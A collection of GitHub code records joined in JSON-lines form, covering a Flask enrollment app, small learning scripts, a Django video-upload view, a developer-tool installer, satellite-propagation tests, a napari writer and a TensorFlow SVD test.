'/teacher/classes')\napi.add_resource(updateDB, '/update_grades')\napi.add_resource(getPotentialClasses, '/student/potential_classes')\napi.add_resource(addCourse, '/student/add_course')\n# assume no user if there is in session then get user g.user for now did only student but have to add teacher also this g.user is used in student html to get name\n\n\n@app.before_request\ndef before_request():\n g.user = None\n if 'user_id' in session:\n query = Students.query.filter_by(user_id=session['user_id']).first()\n if query is None:\n query = Teachers.query.filter_by(\n user_id=session['user_id']).first()\n g.user = query\n\n\n# if there does not exist a user in session then will require them to login, if not then redirect them to student.html or teacher.html which havent implemented\n@app.route('/student')\ndef student_logged():\n if not g.user:\n return redirect(url_for('login_post'))\n return render_template('student.html')\n\n\n@app.route('/teacher')\ndef teacher_logged():\n if not g.user:\n return redirect(url_for('login_post'))\n return render_template('teacher.html')\n\n\n@app.route('/student_grades/')\ndef edit_grades(id):\n if not g.user:\n return redirect(url_for('login_post'))\n return render_template(f'edit_grades.html', id=id)\n\n\n@app.route('/student_get_grades/')\ndef edit_get_grades(id):\n query = Enrollment_table.query.all()\n data = []\n for q in query:\n if q.class_id == int(id):\n data.append([q.class_id, q.student_id, q.grade])\n json_data = json.loads(\"{}\")\n\n for i, cls in enumerate(data):\n student = Students.query.filter_by(id=cls[1]).first()\n json_data.update({i: {\"student_name\": student.name, \"grade\": cls[2]}})\n\n return json_data\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef login_post():\n if request.method == 'POST':\n session.pop('user_id', None)\n username = request.form['username']\n password = request.form['password']\n query_user = Users.query.filter_by(username=username).first()\n if query_user is not None:\n if password == query_user.password:\n session['user_id'] = query_user.id\n print(session['user_id'])\n print(Users.query.filter_by(id=1).first().id)\n if session['user_id'] == Users.query.filter_by(id=1).first().id:\n return redirect('/admin')\n query = Students.query.filter_by(user_id=query_user.id).first()\n isTeacher = False\n if query == None:\n query = Teachers.query.filter_by(\n user_id=query_user.id).first()\n 
isTeacher = True\n if isTeacher:\n return redirect(url_for('teacher_logged'))\n return redirect(url_for('student_logged'))\n\n else:\n return redirect(url_for('login_post'))\n return render_template('login.html')\n\n# this is to logout the user\n\n\n@app.route('/my-link/')\ndef my_link():\n # pop the user fro the current session then redirect to login\n session.pop('user_id', None)\n return redirect(url_for('login_post'))\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"koiralaaayush/Student-Enrollment-App","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":15539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37802621750","text":"import turtle\nimport random\n\ncolors = 'red', 'green', 'yellow', 'orange'\n\nscreen = turtle.Screen()\nscreen.bgcolor('black')\n\npen = turtle.Turtle()\n# pen.pencolor('yellow')\npen.pencolor(random.choice(colors))\npen.speed(0)\npen.width(5)\n\nfor x in range(360):\n pen.forward(x)\n pen.left(59)\n print(x)\n\nturtle.mainloop()\n","repo_name":"chrisogonas/coders_lab","sub_path":"dailycodingproblem/turtles.py","file_name":"turtles.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15344726442","text":"import rand_word\nimport os\nimport draw\n\nclass Game:\n\n def __init__(self):\n self.start()\n\n def start(self):\n self.chars = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\n self.guesses = []\n self.num_of_fails = 0\n self.used_chars = ''\n self.word = rand_word.random_word()\n self.players_word = list('-' * len(self.word))\n self.game_loop()\n\n def game_loop(self):\n while self.num_of_fails < 7:\n self.update_scr()\n\n # print(self.word, self.print_players_word())\n self.guess()\n if len(self.players_guess) > 1:\n if self.players_guess == self.word:\n self.players_word = list(self.players_guess)\n self.update_scr()\n print('\\n', '\\n', 'congrats!!')\n break\n else:\n print('wrong guess!!')\n print('my word: ', self.word)\n break\n self.used_chars += self.players_guess + ' '\n if self.players_guess in self.word and self.players_guess not in self.players_word:\n self.update_players_word()\n\n if self.word == self.print_players_word():\n self.update_scr()\n print('congrats!!')\n break\n else:\n self.num_of_fails += 1\n\n self.update_scr()\n print('my word: ', self.word)\n\n def print_players_word(self):\n self.result = ''\n for i in range(len(self.players_word)):\n self.result += self.players_word[i]\n return self.result\n\n def update_players_word(self):\n for i in range(len(self.players_word)):\n if self.word[i] == self.players_guess:\n self.players_word[i] = self.players_guess\n\n def update_scr(self):\n os.system('cls' if os.name == 'nt' else 'clear')\n self.draw_man(self.num_of_fails)\n print('used characters: ',self.used_chars)\n # print(self.word)\n print('\\n',self.print_players_word(), '\\n')\n # print(self.num_of_fails, 'failures')\n\n def draw_man(self, step):\n draw.hangman_graphic(step)\n\n def guess(self):\n self.players_guess = input('What is your guess? 
')\n\nguess_game = Game()\n","repo_name":"greenfox-zerda-lasers/bereczb","sub_path":"week-05/day-02/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28223321859","text":"import timeit\nstart = timeit.default_timer()\n\n# All the program statements\n\n\ndef selSort(nlist):\n for slot in range(len(nlist)-1,0,-1):\n maxpos=0\n for location in range(1, slot+1):\n if nlist[location]>nlist[maxpos]:\n maxpos= location\n\n temp = nlist[slot]\n nlist[slot] = nlist[maxpos]\n nlist[maxpos] = temp\n\nnlist = [2,45,3,22,56,88,1212,34,9696,3,5,34,5,3,65,34,54,1,0]\nselSort(nlist)\nprint(nlist)\n\n \nstop = timeit.default_timer()\nexecution_time = stop - start\n\nprint(('{:.9f}'.format(execution_time))) # It returns time in seconds to 9 decimal places","repo_name":"tomhealy1/Algos","sub_path":"selsort.py","file_name":"selsort.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7487478459","text":"# Lab week 04, Based on Lecture 2\n# For & While loops\n\n# Write a program (evens.py) that uses a while loop to print all the even numbers from 2 to 100.\n\nnumberTo = 100\nevenNum = 2\n\nwhile evenNum <= numberTo:\n print (evenNum)\n evenNum += 2\n","repo_name":"aharring/GMITPyProg2021","sub_path":"week04/lab4.2.1.evens.py","file_name":"lab4.2.1.evens.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31631299164","text":"from django.shortcuts import render\nfrom django.http import HttpRequest\nfrom django.http import HttpResponse\nfrom django.views.generic import TemplateView\nfrom ..models import Movie, Single, Instrument,Music\nfrom django.core.files.storage import FileSystemStorage\nimport ffmpeg\nfrom mutagen.easyid3 import EasyID3\nimport mutagen.id3\n\nclass continueView(TemplateView):\n template_name = 'app/Continue.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n context['title'] = 'Continue'\n return context\n \n def post(self, request, *args, **kwargs):\n if request.method == 'POST':\n u_id = request.session['uid']\n genre = request.session['genre']\n inst = request.session['inst']\n filename = str(u_id) + \"/\" + genre + \"/\" +inst\n \n if request.is_ajax():\n #Ajax 処理を別メソッドに切り離す\n if request.FILES['movie_record']:\n movie = request.FILES['movie_record']\n fileobject = FileSystemStorage()\n #同じファイルが存在するなら削除\n if fileobject.exists(filename+\".webm\")==True:\n print(\"exist\")\n fileobject.delete(filename+\".webm\")\n\n fileobject.save((filename+\".webm\"),movie) #保存\n \"\"\"try:\n tags = EasyID3(str(\"./media/\"+filename+\".mp4\"))\n \n except mutagen.id3.ID3NoHeaderError:\n tags = mutagen.File(str(\"./media/\"+filename+\".mp4\"), easy=True)\n tags.add_tags()\n \n tag[\"length\"]=81000\n tags.save()\"\"\"\n return HttpResponse(\"ajax is done\")\n\n #動画変換\n stream = ffmpeg.input((\"./media/\"+filename+\".webm\")) \n stream = ffmpeg.output(stream, (\"./media/\"+filename+\".mp4\")) \n ffmpeg.run(stream, overwrite_output=True)\n \n #音楽抽出\n stream = ffmpeg.input(\"./media/\"+filename+\".mp4\") \n stream = ffmpeg.output(stream, (\"./media/\"+filename+\".wav\")) \n ffmpeg.run(stream, overwrite_output=True)\n\n #Musicテーブルに登録&Movieテーブルも登録\n music = Music(music = (filename + \".wav\"))\n music.save()\n m_data = 
Movie(movie_path=(filename + \".mp4\"),music_id=music)\n m_data.save()\n\n #Singleテーブルを更新\n instrument = Instrument.objects.get(instrument_name=inst)\n s_data = Single.objects.select_related('instrument_id').get(uid=u_id,instrument_id=instrument)\n s_data.movie_id = m_data\n s_data.save()\n\n request.session['p_flag'] = 1\n \n return render(request,'app/Continue.html')\n\nContinue = continueView.as_view()","repo_name":"pagopani/HappyJam","sub_path":"HappyJam/app/views/continueView.py","file_name":"continueView.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25278479494","text":"# 2021 Ensomniac\n# Ryan Martin ryan@ensomniac.com\n\n\"\"\"\n| This script requires that you have an account at https://dash.guide\n|\n| This script installs PyDash, so that you can import Dash on this environment\n| This script installs the command line tool dashsync\n\"\"\"\n\nimport os\nimport sys\nimport json\nimport site\nimport getpass\nimport requests\n\n\nclass Setup:\n _dash_data: dict\n _package_paths: list\n\n def __init__(self):\n print(\"\\nDash - Tools for Developers\\n\")\n\n self.dash_data_path = os.path.join(os.path.expanduser(\"~\"), \".dash\")\n\n self.preflight()\n\n self.user = self.authenticate()\n self.package_root = os.path.dirname(os.path.realpath(__file__)) + \"/\"\n self.pydash_module_root = self.find_pydash_root()\n self.pydash_module_dest = self.find_pydash_dest()\n\n self.install_cli()\n self.link_pydash()\n\n @property\n def dash_creds(self):\n if not os.path.exists(self.dash_data_path):\n return None\n\n if not hasattr(self, \"_dash_data\"):\n self._dash_data = json.loads(open(self.dash_data_path, \"r\").read())\n\n return self._dash_data\n\n @property\n def package_paths(self):\n if not hasattr(self, \"_package_paths\"):\n self._package_paths = []\n\n all_files = [\n os.path.join(dp, f)\n for dp, dn, fn in os.walk(self.package_root)\n for f in fn\n ]\n\n for filename in all_files:\n if \".git\" in filename or \"/.D\" in filename or \".pyc\" in filename:\n continue\n\n self._package_paths.append(filename)\n\n return self._package_paths\n\n @property\n def cli_content(self):\n return \"\\n\".join([\n \"#!/bin/bash\",\n \"#\",\n f\"# Script generated by {os.path.join(os.getcwd(), __file__)}\",\n \"\",\n f\"{sys.executable} -c 'import Dash;Dash.Sync()' \"\n ])\n\n def install_cli(self):\n local_bin = os.path.join(\"/usr\", \"local\", \"bin\")\n cli_path = os.path.join(local_bin, \"dashsync\")\n\n os.makedirs(local_bin, exist_ok=True)\n\n if os.path.exists(cli_path):\n os.remove(cli_path)\n\n try:\n open(cli_path, \"w\").write(self.cli_content)\n\n except PermissionError:\n from subprocess import check_output\n\n temp_path = os.path.join(\"/var\", \"tmp\", \"dashsync\")\n\n open(temp_path, \"w\").write(self.cli_content)\n\n print(check_output(\n f'sudo mv {temp_path} {cli_path}', # sudo is necessary\n shell=True\n ).decode().strip().strip(\"\\n\"))\n\n except:\n print(\"\\nERROR: Unable to install the CPE CLI!\\n\")\n\n return\n\n if not os.path.exists(cli_path):\n sys.exit(\"\\nError: Unable to install dashsync!\\n\")\n\n os.system(f\"chmod +x {cli_path}\")\n\n print(\"\\tDash cli tool 'dashsync' installed!\")\n\n def link_pydash(self):\n if os.path.exists(self.pydash_module_dest):\n if os.path.islink(self.pydash_module_dest):\n os.unlink(self.pydash_module_dest)\n else:\n os.remove(self.pydash_module_dest)\n\n try:\n os.symlink(self.pydash_module_root, self.pydash_module_dest)\n\n 
except FileExistsError:\n os.remove(self.pydash_module_dest)\n os.symlink(self.pydash_module_root, self.pydash_module_dest)\n\n if not os.path.exists(self.pydash_module_dest):\n sys.exit(\"\\nError: Unable to install pydash!\\n\")\n\n print(\"\\tPydash module installed!\")\n\n def find_pydash_dest(self):\n pydash_dest = None\n\n for path in site.getsitepackages():\n if os.path.exists(path):\n pydash_dest = os.path.join(path, \"Dash\")\n\n if not pydash_dest:\n sys.exit(\"\\nError: Unable to locate your system's python site packages!\\n\")\n\n print(f\"\\tPydash module link: '{pydash_dest}'\")\n\n return pydash_dest\n\n def find_pydash_root(self):\n pydash_root = None\n\n for package_path in self.package_paths:\n if \"pydash/\" not in package_path:\n continue\n\n if \"__init__.py\" not in package_path:\n continue\n\n if \"SETUP_PYDASH\" not in open(package_path, \"r\").read():\n continue\n\n pydash_root = \"/\".join(package_path.split(\"/\")[:-1]) + \"/\"\n\n break\n\n if not pydash_root:\n sys.exit(\"\\nError: Unable to locate pydash!\\n\")\n\n print(f\"\\tPydash module: '{pydash_root}'\")\n\n return pydash_root\n\n # Checks to make sure this is being installed correctly\n def preflight(self):\n if os.path.exists(os.path.join(\"/var\", \"www\", \"vhosts\", \"oapi.co\", \"logs\")):\n sys.exit(\"\\nError: This setup.py is not intended for the server\\n\")\n\n def authenticate(self):\n if self.dash_creds:\n return\n\n if os.path.exists(self.dash_data_path):\n os.remove(self.dash_data_path)\n\n email = input(\"Enter your email (from https://dash.guide): \").strip()\n\n if not email:\n sys.exit()\n\n password = getpass.getpass(prompt=\"Enter your password: \")\n\n if not password:\n return\n\n response = requests.post(\n \"https://dash.guide/Users\",\n data={\n \"f\": \"login\",\n \"email\": email,\n \"pass\": password\n }\n ).json()\n\n if response.get(\"error\"):\n sys.exit(f\"\\nUnable to authenticate @ https://dash.guide/\\n\\tReason:\\n{response['error']}\\n\")\n\n if not response.get(\"token\"):\n sys.exit(f\"\\nUnable to authenticate @ https://dash.guide/\\n\\tReason: Unknown\\n\")\n\n dash_data = {\"user\": response}\n\n open(self.dash_data_path, \"w\").write(json.dumps(dash_data))\n\n self._dash_data = dash_data\n\n print(\"\\nSuccessfully authenticated!\\n\")\n\n return dash_data[\"user\"]\n\n\nif __name__ == \"__main__\":\n Setup()\n","repo_name":"ensomniac/dash","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":6061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22597778735","text":"#! 
/user/bin/env python3\nimport unittest\nfrom dshsaa.raw import settings, maindll, envdll, astrodll, timedll, tledll, sgp4dll\nimport ctypes as c\nimport pdb\n\nclass TestSgp4Dll(unittest.TestCase):\n\t\n\tdef setUp(self):\n\t\t#init maindll\n\t\tself.maindll_handle = maindll.DllMainInit()\n\t\t\n\t\t# init other dlls\n\t\tdef init_subdll(initer):\n\t\t\tretcode = initer(self.maindll_handle)\n\t\t\tif retcode != 0:\n\t\t\t\traise Exception(\"Failed to init %s with error code %i\" % ('initer.__name__', retcode))\n\t\t\n\t\tinit_subdll(timedll.TimeFuncInit)\n\t\tinit_subdll(tledll.TleInit)\n\t\tinit_subdll(envdll.EnvInit)\n\t\tinit_subdll(astrodll.AstroFuncInit)\n\t\tsgp4dll.Sgp4SetLicFilePath('./dshsaa/libdll/') #get the license before initing sgp4\n\t\tinit_subdll(sgp4dll.Sgp4Init)\n\t\t\n\t\t# open a log file\n\t\tmaindll.OpenLogFile('sgp4.log')\n\t\t\n\t\t# Initialize a TLE\n\t\tline1 = '1 25544U 98067A 19311.39056523 .00000757 00000-0 21099-4 0 9992'\n\t\tline2 = '2 25544 51.6451 11.2360 0005828 238.9618 210.3569 15.50258526197470'\n\t\tgeneric_satKey = tledll.TleAddSatFrLines(line1, line2)\n\t\tif generic_satKey.value <= 0:\n\t\t\traise Exception(\"Failed to init generic_satKey with code %i\" % generic_satKey.value)\n\t\telse:\n\t\t\tself.generic_satKey = generic_satKey\n\t\t\n\t\t# Initialize that satellite in the SGP4 context\n\t\tretcode = sgp4dll.Sgp4InitSat(generic_satKey)\n\t\tif retcode != 0:\n\t\t\traise Exception(\"Failed to init tle with code %i\" % (retcode))\n\t\n\t##Sgp4GetInfo\n\tdef test_Sgp4GetInfo(self):\n\t\tinfoStr = sgp4dll.Sgp4GetInfo()\n\t\tself.assertTrue(infoStr)\n\t\t\n\t##Sgp4GetLicFilePath \n\tdef test_Sgp4GetLicFilePath(self):\n\t\tlicFilePath = sgp4dll.Sgp4GetLicFilePath()\n\t\t\n\t##Sgp4GetPropOut\n\tdef test_Sgp4GetPropOut(self):\n\t\t# propogate a satellite\n\t\tsatKey = self.generic_satKey\n\t\tmse = 3600\n\t\t(retcode, ds50UTC, pos, vel, llh) = sgp4dll.Sgp4PropMse(satKey, mse)\n\t\tself.assertEqual(retcode, 0)\n\t\t\n\t\t# retrieve data\n\t\tfor xf_Sgp4Out in [1,2,3,4]:\n\t\t\t(retcode, destArr) = sgp4dll.Sgp4GetPropOut(satKey, xf_Sgp4Out)\n\t\t\n\t\t#TODO: Add assertEquals for data\n\t\n\t\n\t##Sgp4Init\n\tdef test_Sgp4Init(self):\n\t\t# if the setup is complete, this test is passed\n\t\t1\n\t\t\n\t##Sgp4InitSat\n\tdef test_Sgp4InitSat(self):\n\t\t# if the setup is complete, this test is passed\n\t\t1\n\t\t\n\t##Sgp4PosVelToKep\n\tdef test_Sgp4PosVelToKep(self):\n\t\tyr = 2020\n\t\tday = 11.6\n\t\t# grabbed some coords from https://spaceflight.nasa.gov/realdata/sightings/SSapplications/Post/JavaSSOP/orbit/ISS/SVPOST.html\n\t\tpos = [x/1000 for x in [3779875.33, 3487522.78, 4441142.89]]\n\t\tvel = [x/1000 for x in [-6114.409610, 2394.224646, 3312.814084]]\n\t\t(retcode, posNew, velNew, sgp4MeanKep) = sgp4dll.Sgp4PosVelToKep(yr, day, pos, vel)\n\t\t# TODO: Add real test data\n\t\n\t##Sgp4PropAll\n\tdef test_Sgp4PropAll(self):\n\t\tsatKey = self.generic_satKey\n\t\ttimeType = 0\n\t\ttimeIn = 0\n\t\t(retcode, xa_Sgp4Out) = sgp4dll.Sgp4PropAll(satKey, timeType, timeIn)\n\t\tself.assertEqual(retcode, 0)\n\t\t\n\t\tsatKey = self.generic_satKey\n\t\ttimeType = 0\n\t\ttimeIn = 3600\n\t\t(retcode, xa_Sgp4Out) = sgp4dll.Sgp4PropAll(satKey, timeType, timeIn)\n\t\tself.assertEqual(retcode, 0)\n\t\t\n\t\tsatKey = self.generic_satKey\n\t\ttimeType = 1\n\t\ttimeIn = 25852.6\n\t\t(retcode, xa_Sgp4Out) = sgp4dll.Sgp4PropAll(satKey, timeType, timeIn)\n\t\tself.assertEqual(retcode, 0)\n\t\t\n\t\t# TODO: Add data driven test results\n\t\t\n\t##Sgp4PropDs50UTC \n\tdef 
test_Sgp4PropDs50UTC(self):\n\t\tsatKey = self.generic_satKey\n\t\tds50UTC = 25852.6\n\t\t(retcode, mse, pos, vel, llh) = sgp4dll.Sgp4PropDs50UTC(satKey, ds50UTC)\n\t\tself.assertEqual(retcode, 0)\n\t\t\n\t##Sgp4PropDs50UtcLLH \n\tdef test_Sgp4PropDs50UtcLLH(self):\n\t\tsatKey = self.generic_satKey\n\t\tds50UTC = 25852.6\n\t\t(retcode, llh) = sgp4dll.Sgp4PropDs50UtcLLH(satKey, ds50UTC)\n\t\tself.assertEqual(retcode, 0)\n\t\n\t\n\t##Sgp4PropDs50UtcPos \n\tdef test_Sgp4PropDs50UtcPos(self):\n\t\tsatKey = self.generic_satKey\n\t\tds50UTC = 25852.6\n\t\t(retcode, pos) = sgp4dll.Sgp4PropDs50UtcPos(satKey, ds50UTC)\n\t\tself.assertEqual(retcode, 0)\n\t\t\n\t##Sgp4PropMse\n\tdef test_Sgp4PropMse(self):\n\t\tsatKey = self.generic_satKey\n\t\tmse = 3600\n\t\t(retcode, ds50UTC, pos, vel, llh) = sgp4dll.Sgp4PropMse(satKey, mse)\n\t\tself.assertEqual(retcode, 0)\n\t\t# TODO: Add assertEquals for data from test case on blog\n\t\n\t##Sgp4ReepochTLE\n\tdef test_Sgp4ReepochTLE(self):\n\t\tsatKey = self.generic_satKey\n\t\treepochDs50UTC = 25852.6\n\t\t(retcode, line1Out, line2Out) = sgp4dll.Sgp4ReepochTLE(satKey, reepochDs50UTC)\n\t\tself.assertEqual(retcode, 0)\n\t\t# TODO: need real data\n\t\n\t##Sgp4RemoveAllSats\n\tdef test_Sgp4RemoveAllSats(self):\n\t\tretcode = sgp4dll.Sgp4RemoveAllSats()\n\t\tself.assertEqual(retcode, 0)\n\t\t\n\t##Sgp4RemoveSat\n\tdef test_Sgp4RemoveSat(self):\n\t\tsatKey = self.generic_satKey\n\t\tretcode = sgp4dll.Sgp4RemoveSat(satKey)\n\t\tself.assertEqual(retcode, 0)\n\t\t# TODO: verify satKey actually removed\n\t\n\t##Sgp4SetLicFilePath \n\n\n\tdef tearDown(self):\n\t\ttledll.TleRemoveAllSats()\n\t\treturn None\n","repo_name":"hardingprofessional/dshsaa","sub_path":"test/raw/test_sgp4dll.py","file_name":"test_sgp4dll.py","file_ext":"py","file_size_in_byte":4767,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"30858411051","text":"# Tento usar o ingles para me ajudar, pois acredito ser bastante importante para o nosso ramo.\n# Também estou me acostumando a usar o type hints. 
Pois acredito ajudar na legibilidade e manutenibilidade do código.\nimport math\n\n\nnumber_of_tests: int = int(input())\n\n# Com o numero informado pude usar range e for para criar um lupe N vezes\nfor number_test in range(number_of_tests):\n # Coletei a quantidade de bolas sem ser a branca e declarei variaveis inportante para o próximo for\n available_balls: int = int(input())\n white_ball: int = 1\n x_white_ball: int = 0\n y_white_ball: int = 0\n # Esses valores são maiores do que o enunciado permite vir como input, logo sem serão substituidos pelo if a seguir\n closest_ball: int = 1000000\n distance_of_closest_ball: float = 1000000.0\n\n for number_ball in range(available_balls + white_ball):\n ball_coordenates: list = input().split()\n x_ball: int = int(ball_coordenates[0])\n y_ball: int = int(ball_coordenates[1])\n\n # Caso seja a primeira bola (bola branca, armazena os dados nas variaveis\n if number_ball == 0:\n x_white_ball = x_ball\n y_white_ball = y_ball\n else:\n # Caso não seja a bola branca, verifica a distancia que esta da bola branca por Pitagoras\n leg_x: int = x_white_ball - x_ball\n leg_y: int = y_white_ball - y_ball\n hypotenuse: float = math.sqrt((leg_x ** 2) + (leg_y ** 2))\n\n # Se estiver mais proximo que a bola anterior, armazena o valor da bola e a distancia\n is_closer: bool = hypotenuse < distance_of_closest_ball\n if is_closer:\n closest_ball = number_ball\n distance_of_closest_ball = hypotenuse\n\n print(closest_ball)\n","repo_name":"PabloVKF/programacaoo_orientada_a_objetos_I","sub_path":"prova_1/1554.py","file_name":"1554.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32344380414","text":"\"\"\"\nThis module is an example of a barebones writer plugin for napari.\n\nIt implements the Writer specification.\nsee: https://napari.org/plugins/stable/guides.html#writers\n\nReplace code below according to your needs.\n\"\"\"\nfrom __future__ import annotations\nfrom typing import TYPE_CHECKING, List, Any, Sequence, Tuple, Union\n\nimport itk\nfrom itk_napari_conversion import image_from_image_layer\nfrom pathlib import Path\nimport napari\n\nif TYPE_CHECKING:\n DataType = Union[Any, Sequence[Any]]\n FullLayerData = Tuple[DataType, dict, str]\n\n\ndef write_single(path: str, data: Any, meta: dict) -> List[str]:\n \"\"\"Writes a single layer\"\"\"\n pass\n\n\ndef write_multiple(path: str, data: List[FullLayerData]) -> List[str]:\n \"\"\"Writes multiple layers of different types.\"\"\"\n written_paths = []\n for i, image_layer_tuple in enumerate(data):\n image_layer = napari.layers.Image(image_layer_tuple[0], metadata=image_layer_tuple[1]['metadata'])\n image = image_from_image_layer(image_layer)\n\n if len(data) == 1:\n itk.imwrite(image, path)\n written_paths = [path]\n else:\n unique_path = Path(path)\n unique_path = str(Path(unique_path.parent) / (unique_path.stem + \"_\" + image_layer_tuple[1]['name'] + unique_path.suffix))\n itk.imwrite(image, unique_path)\n written_paths.append(unique_path)\n\n return written_paths \n","repo_name":"InsightSoftwareConsortium/napari-itk-io","sub_path":"src/napari_itk_io/_writer.py","file_name":"_writer.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"39795989850","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n\nfrom 
tensorflow.python.framework import constant_op\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import linalg_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.platform import test\n\n\nclass SvdOpTest(test.TestCase):\n\n def testWrongDimensions(self):\n # The input to svd should be a tensor of at least rank 2.\n scalar = constant_op.constant(1.)\n with self.assertRaisesRegexp(ValueError,\n \"Shape must be at least rank 2 but is rank 0\"):\n linalg_ops.svd(scalar)\n vector = constant_op.constant([1., 2.])\n with self.assertRaisesRegexp(ValueError,\n \"Shape must be at least rank 2 but is rank 1\"):\n linalg_ops.svd(vector)\n\n\ndef _GetSvdOpTest(dtype_, shape_, use_static_shape_):\n\n is_complex = dtype_ in (np.complex64, np.complex128)\n is_single = dtype_ in (np.float32, np.complex64)\n\n def CompareSingularValues(self, x, y):\n if is_single:\n tol = 5e-5\n else:\n tol = 1e-14\n self.assertAllClose(x, y, atol=(x[0] + y[0]) * tol)\n\n def CompareSingularVectors(self, x, y, rank):\n if is_single:\n atol = 5e-4\n else:\n atol = 5e-14\n # We only compare the first 'rank' singular vectors since the\n # remainder form an arbitrary orthonormal basis for the\n # (row- or column-) null space, whose exact value depends on\n # implementation details. Notice that since we check that the\n # matrices of singular vectors are unitary elsewhere, we do\n # implicitly test that the trailing vectors of x and y span the\n # same space.\n x = x[..., 0:rank]\n y = y[..., 0:rank]\n # Singular vectors are only unique up to sign (complex phase factor for\n # complex matrices), so we normalize the sign first.\n sum_of_ratios = np.sum(np.divide(y, x), -2, keepdims=True)\n phases = np.divide(sum_of_ratios, np.abs(sum_of_ratios))\n x *= phases\n self.assertAllClose(x, y, atol=atol)\n\n def CheckApproximation(self, a, u, s, v, full_matrices):\n if is_single:\n tol = 1e-5\n else:\n tol = 1e-14\n # Tests that a ~= u*diag(s)*transpose(v).\n batch_shape = a.shape[:-2]\n m = a.shape[-2]\n n = a.shape[-1]\n diag_s = math_ops.cast(array_ops.matrix_diag(s), dtype=dtype_)\n if full_matrices:\n if m > n:\n zeros = array_ops.zeros(batch_shape + (m - n, n), dtype=dtype_)\n diag_s = array_ops.concat([diag_s, zeros], a.ndim - 2)\n elif n > m:\n zeros = array_ops.zeros(batch_shape + (m, n - m), dtype=dtype_)\n diag_s = array_ops.concat([diag_s, zeros], a.ndim - 1)\n a_recon = math_ops.matmul(u, diag_s)\n a_recon = math_ops.matmul(a_recon, v, adjoint_b=True)\n self.assertAllClose(a_recon.eval(), a, rtol=tol, atol=tol)\n\n def CheckUnitary(self, x):\n # Tests that x[...,:,:]^H * x[...,:,:] is close to the identity.\n xx = math_ops.matmul(x, x, adjoint_a=True)\n identity = array_ops.matrix_band_part(array_ops.ones_like(xx), 0, 0)\n if is_single:\n tol = 1e-5\n else:\n tol = 1e-14\n self.assertAllClose(identity.eval(), xx.eval(), atol=tol)\n\n def Test(self):\n np.random.seed(1)\n x_np = np.random.uniform(\n low=-1.0, high=1.0, size=np.prod(shape_)).reshape(shape_).astype(dtype_)\n if is_complex:\n x_np += 1j * np.random.uniform(\n low=-1.0, high=1.0,\n size=np.prod(shape_)).reshape(shape_).astype(dtype_)\n\n for compute_uv in False, True:\n for full_matrices in False, True:\n with self.test_session() as sess:\n if use_static_shape_:\n x_tf = constant_op.constant(x_np)\n else:\n x_tf = array_ops.placeholder(dtype_)\n\n if compute_uv:\n s_tf, u_tf, v_tf = linalg_ops.svd(x_tf,\n compute_uv=compute_uv,\n full_matrices=full_matrices)\n if use_static_shape_:\n s_tf_val, u_tf_val, v_tf_val = 
sess.run([s_tf, u_tf, v_tf])\n else:\n s_tf_val, u_tf_val, v_tf_val = sess.run([s_tf, u_tf, v_tf],\n feed_dict={x_tf: x_np})\n else:\n s_tf = linalg_ops.svd(x_tf,\n compute_uv=compute_uv,\n full_matrices=full_matrices)\n if use_static_shape_:\n s_tf_val = sess.run(s_tf)\n else:\n s_tf_val = sess.run(s_tf, feed_dict={x_tf: x_np})\n\n if compute_uv:\n u_np, s_np, v_np = np.linalg.svd(x_np,\n compute_uv=compute_uv,\n full_matrices=full_matrices)\n else:\n s_np = np.linalg.svd(x_np,\n compute_uv=compute_uv,\n full_matrices=full_matrices)\n # We explicitly avoid the situation where numpy eliminates a first\n # dimension that is equal to one\n s_np = np.reshape(s_np, s_tf_val.shape)\n\n CompareSingularValues(self, s_np, s_tf_val)\n if compute_uv:\n CompareSingularVectors(self, u_np, u_tf_val, min(shape_[-2:]))\n CompareSingularVectors(self,\n np.conj(np.swapaxes(v_np, -2, -1)), v_tf_val,\n min(shape_[-2:]))\n CheckApproximation(self, x_np, u_tf_val, s_tf_val, v_tf_val,\n full_matrices)\n CheckUnitary(self, u_tf_val)\n CheckUnitary(self, v_tf_val)\n\n return Test\n\n\nif __name__ == \"__main__\":\n for dtype in np.float32, np.float64, np.complex64, np.complex128:\n for rows in 1, 2, 5, 10, 32, 100:\n for cols in 1, 2, 5, 10, 32, 100:\n for batch_dims in [(), (3,)] + [(3, 2)] * (max(rows, cols) < 10):\n shape = batch_dims + (rows, cols)\n for use_static_shape in True, False:\n name = \"%s_%s_%s\" % (dtype.__name__, \"_\".join(map(str, shape)),\n use_static_shape)\n setattr(SvdOpTest, \"testSvd_\" + name,\n _GetSvdOpTest(dtype, shape, use_static_shape))\n 